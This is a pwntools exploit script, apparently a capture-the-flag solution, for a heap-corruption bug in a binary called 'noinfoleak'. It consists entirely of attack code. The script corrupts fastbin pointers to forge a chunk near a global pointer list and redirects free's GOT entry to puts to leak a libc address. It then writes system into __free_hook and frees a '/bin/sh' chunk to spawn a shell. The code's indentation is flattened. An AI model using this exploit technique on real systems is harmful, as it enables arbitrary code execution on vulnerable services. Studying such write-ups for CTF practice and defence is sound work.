from pwn import *
context.os='Linux'
#context.arch='amd64'
debug = 1
if debug:
#context.log_level='debug'
cn=process('./noinfoleak')
elf=ELF('./noinfoleak')
#libc=ELF('./libc-2.23.so')
libc=elf.libc
s = lambda data :cn.send(str(data))
sa = lambda delim,data :cn.sendafter(str(delim), str(data))
st = lambda delim,data :cn.sendthen(str(delim), str(data))
sl = lambda data :cn.sendline(str(data))
sla = lambda delim,data :cn.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :cn.recv(numb)
rl = lambda :cn.recvline()
ru = lambda delims :cn.recvuntil(delims)
irt = lambda :cn.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
def add(size,value):
ru('>')
sl(1)
ru('>')
sl(size)
ru('>')
s(value)
def dele(ind):
ru('>')
sl(2)
ru('>')
sl(ind)
def edit(ind,value):
ru('>')
sl(3)
#sla('>',3)
sla('>',ind)
sa('>',value)
lis = 0x6010a0
#leak libc_base
add(0x5f,'a'*0x10)#0
add(0x5f,'a'*0x10)#1
add(0x7f,'\x11'*0x7f)#2
add(0x10,'leo')#3
dele(2)
dele(0)
dele(1)
fake_size_addr = 0x601095
edit(1,p64(fake_size_addr-8))
pay='\x00'*3+p64(0)*2+p64(lis)*2+p64(lis)*2
add(0x5f,'/bin/sh\x00')#4
add(0x7f,'\x78')#5
add(0x5f,pay)#6
edit(2,p64(elf.got['free'])+p64(0x100))#chunk0
edit(0,p64(elf.plt['puts']))
dele(5)
libc_base = uu64(r(6))-0x3c4b78
success('libc_base= {}'.format(hex(libc_base)))
sys = libc_base + libc.symbols['system']
free_hook = libc.symbols['__free_hook']+libc_base
free = libc.symbols['free']+libc_base
success('free= {}'.format(hex(free)))
edit(0,p64(free))
edit(2,p64(free_hook))#chunk0
edit(0,p64(sys))
dele(4)
irt()